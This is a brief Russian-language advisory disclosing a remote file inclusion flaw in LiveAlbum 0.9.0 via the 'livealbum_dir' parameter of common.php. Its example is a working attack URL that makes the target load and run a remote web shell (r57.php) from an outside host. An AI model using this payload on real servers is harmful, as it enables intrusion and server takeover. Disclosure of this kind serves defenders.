Программа: LiveAlbum 0.9.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «livealbum_dir» сценарием common.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?